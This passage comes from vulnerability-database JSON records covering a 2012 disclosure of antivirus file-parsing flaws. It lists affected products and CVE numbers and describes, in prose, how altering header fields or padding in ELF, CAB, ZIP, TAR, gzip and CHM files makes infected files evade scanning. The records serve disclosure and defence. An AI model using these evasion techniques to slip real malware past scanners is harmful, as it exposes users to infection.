Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1453\n\n36. \u0027ei_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1454\n\n37. \u0027vMinor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n of a clean TAR archive and a virus-infected ZIP archive, is parsed \n incorrectly and evades detection. If the length field in the header of a file with test EICAR virus\n included into a TAR archive is set to be greater than the archive\u0027s total \n length (1,000,000+original length in our experiments), the antivirus \n declares the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, \n AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, \n Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, \n GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, \n Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, \n Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1457\n\n40. A Windows Compiled HTML Help (CHM) file is a set of HTML files,\n scripts, and images compressed using the LZX algorithm. \n For faster random accesses, the algorithm is reset at intervals\n instead of compressing the entire file as a single stream. The\n length of each interval is specified in the LZXC header. \n\n If an infected CHM file\u0027s header modified so that the reset interval\n is lower than in the original file, the antivirus declares the file\n to be clean. But the Windows CHM viewer hh.exe correctly decompresses\n the infected content located before the tampered header. \n\n Affected products -\n ClamAV 0.96.4, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1458\n\n41. In a POSIX TAR archive, each member file has a 512-byte header protected\n by a simple checksum. Every header also contains a file length field, which\n is used by the extractor to locate the next header in the archive. \n\n If a TAR archive contains two files: the first one is clean, while\n the second is infected with test EICAR virus - and it is modified such that \n the length field in the header of the first, clean file to point into the \n middle of the header of the second, infected file. The antivirus declares \n the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, \n Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, \n CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Comodo 7424, \n Emsisoft 5.1.0.1, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n Fortinent 4.2.254.0, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, \n Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7, \n PCTools 7.0.3.5, Rising 22.83.00.03, Sophos 4.61.0, \n Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, \n TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, \n VirusBuster 13.6.151.0 \n\n CVE no - \n CVE-2012-1459\n\n42. If an infected tar.gz archive is appended 6 random bytes at the end, \n the antivirus declares the file to be clean but virus gets extracted by\n the gunzip+tar programs correctly by ignoring these bytes. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, \n eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, \n K7AntiVirus 9.77.3565, VBA32 3.12.14.2 \n \n CVE no - \n CVE-2012-1460\n\n43. GZIP files can contain multiple compressed streams, which are assembled\n when the contents are extracted. If an infected .tar.gz file is broken \n into two streams, the antivirus declares the infected .tar.gz file to \n be clean while tar+gunzip extract the virus correctly\n\n Affected products -\n AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, \n F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, \n Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1461\n\n44. If an infected ZIP archive is prepended with 1024 random bytes at the \n beginning, the antivirus declares the file to be clean but virus gets extracted\n by the unzip program correctly by skipping these bytes\n\n Affected products -\n AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, \n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, \n Symantec 20101.3.0.103 \n\n CVE no - \n CVE-2012-1462\n\n45. In most ELF files, the 5th byte of the header indicates endianness: 01\n for little-endian, 02 for bigendian. Linux kernel, however, does not\n check this field before loading an ELF file. If an infected ELF file\u0027s 5-th \n byte is set to 02, the antivirus declares the file to be clean but the ELF \n file gets executed correctly. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, \n Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7 \n\n CVE no - \n CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1440"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "PACKETSTORM",
"id": "110990"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-1440",
"trust": 2.9
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
"trust": 0.6
},
{
"db": "BID",
"id": "52595",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-54721",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "110990",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"id": "VAR-201203-0400",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T22:49:45.123000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/jp/default.aspx"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.fortinet.com/solutions/antivirus.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.norman.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ps-japan.co.jp/"
},
{
"title": "eSafe",
"trust": 0.8,
"url": "http://www.aladdin.co.jp/esafe/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/522005"
},
{
"trust": 1.7,
"url": "http://www.ieee-security.org/tc/sp2012/program.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1440"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1440"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "http://www.safenet-inc.com/data-protection/content-security-esafe/"
},
{
"trust": 0.3,
"url": "http://anti-virus-software-review.toptenreviews.com/norman-review.html"
},
{
"trust": 0.3,
"url": "http://www.pandasecurity.com/usa/"
},
{
"trust": 0.3,
"url": "/archive/1/522005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1419"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1439"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1426"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1429"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1440"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1432"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1438"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1428"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1446"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1443"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1444"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1441"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1421"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1430"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1435"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1431"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1423"
},
{
"trust": 0.1,
"url": "http://www.ieee-security.org/tc/sp2012/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1442"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1433"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1420"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-1437"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-54721"
},
{
"db": "BID",
"id": "52595"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"db": "PACKETSTORM",
"id": "110990"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54721"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52595"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"date": "2012-03-19T23:51:01",
"db": "PACKETSTORM",
"id": "110990"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"date": "2012-03-21T10:11:47.957000",
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-54721"
},
{
"date": "2012-03-20T00:00:00",
"db": "BID",
"id": "52595"
},
{
"date": "2012-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001875"
},
{
"date": "2012-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201203-404"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2012-1440"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple products ELF Vulnerability to bypass malware detection in file parser",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001875"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201203-404"
}
],
"trust": 0.6
}
}
VAR-201203-0377
Vulnerability from variot - Updated: 2025-04-11 22:49The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. Multiple products CAB The file parser contains a vulnerability that can bypass malware detection. CVE May be split intoChanged by a third party coffFiles Have fields CAB Via files, malware detection can be bypassed. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. The following products are affected: McAfee 5.0.2.03300 TrendMicro-HouseCall 9.120.0.1004 Kaspersky 7.0.0.125 Sophos 4.61.0 TrendMicro 9.120.0.1004 McAfee-GW-Edition 2010.1C Emsisoft 5.1.0.1 eTrust-Vet 36.1.8511 Antiy-AVL 2.0.3.7 Microsoft 1.6402, Rising 22.83.00.03 Ikarus T3.1.1.97.0 Fortinet 4.2.254.0 Panda 10.0.2.7
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201203-0377",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus",
"scope": "eq",
"trust": 2.1,
"vendor": "kaspersky",
"version": "7.0.0.125"
},
{
"model": "avl sdk",
"scope": "eq",
"trust": 1.8,
"vendor": "antiy",
"version": "2.0.3.7"
},
{
"model": "etrust vet antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "36.1.8511"
},
{
"model": "anti-malware",
"scope": "eq",
"trust": 1.8,
"vendor": "emsisoft",
"version": "5.1.0.1"
},
{
"model": "virus utilities t3 command line scanner",
"scope": "eq",
"trust": 1.8,
"vendor": "ikarus",
"version": "1.1.97.0"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.8,
"vendor": "sophos",
"version": "4.61.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.8,
"vendor": "fortinet",
"version": "4.2.254.0"
},
{
"model": "security essentials",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "2.0"
},
{
"model": "panda antivirus",
"scope": "eq",
"trust": 1.6,
"vendor": "pandasecurity",
"version": "10.0.2.7"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "rising global",
"version": "22.83.00.03"
},
{
"model": "trend micro antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "trendmicro",
"version": "9.120.0.1004"
},
{
"model": "dr.web antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "drweb",
"version": "5.0.2.03300"
},
{
"model": "housecall",
"scope": "eq",
"trust": 1.0,
"vendor": "trendmicro",
"version": "9.120.0.1004"
},
{
"model": "gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "rising",
"version": "22.83.00.03"
},
{
"model": "dr.web antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "doctor web",
"version": "5.0.2.03300"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "panda security",
"version": "10.0.2.7"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "trend micro",
"version": "9.120.0.1004"
},
{
"model": "housecall",
"scope": "eq",
"trust": 0.8,
"vendor": "trend micro",
"version": "9.120.0.1004"
},
{
"model": "web gateway software",
"scope": "eq",
"trust": 0.8,
"vendor": "mcafee",
"version": "2010.1c"
},
{
"model": "trend micro",
"scope": "eq",
"trust": 0.3,
"vendor": "trend micro",
"version": "9.1201004"
},
{
"model": "housecall",
"scope": "eq",
"trust": 0.3,
"vendor": "trend micro",
"version": "9.1201004"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "4.61"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "rising",
"version": "22.8303"
},
{
"model": "cat-quickheal",
"scope": "eq",
"trust": 0.3,
"vendor": "quick heal",
"version": "11.00"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "panda",
"version": "10.0.27"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "1.6402"
},
{
"model": "mcafee-gw-edition 2010.1c",
"scope": null,
"trust": 0.3,
"vendor": "mcafee",
"version": null
},
{
"model": "mcafee",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "5.0.2.03300"
},
{
"model": "antivirus t3.1.1.97.0",
"scope": null,
"trust": 0.3,
"vendor": "ikarus",
"version": null
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.2.2540"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "emsisoft",
"version": "5.11.0"
},
{
"model": "antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "emsisoft",
"version": "5.11"
},
{
"model": "associates etrust vet antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "36.1.8511"
},
{
"model": "antiy-avl",
"scope": "eq",
"trust": 0.3,
"vendor": "antiy",
"version": "2.0.37"
}
],
"sources": [
{
"db": "BID",
"id": "52621"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:antiy:avl_sdk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:rising-global:rising_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_vet_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:drweb:dr.web_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:emsisoft:anti-malware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ikarus:ikarus_virus_utilities_t3_command_line_scanner",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:pandasecurity:panda_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:kaspersky:kaspersky_anti-virus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:sophos:anti-virus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:trendmicro:trend_micro_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:trendmicro:housecall",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:fortinet:fortinet_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:microsoft:security_essentials",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:web_gateway",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Suman Jana and Vitaly Shmatikov",
"sources": [
{
"db": "BID",
"id": "52621"
}
],
"trust": 0.3
},
"cve": "CVE-2012-1453",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2012-1453",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-54734",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2012-1453",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2012-1453",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201203-416",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-54734",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-54734"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001867"
},
{
"db": "CNNVD",
"id": "CNNVD-201203-416"
},
{
"db": "NVD",
"id": "CVE-2012-1453"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. Multiple products CAB The file parser contains a vulnerability that can bypass malware detection. CVE May be split intoChanged by a third party coffFiles Have fields CAB Via files, malware detection can be bypassed. \nSuccessful exploits will 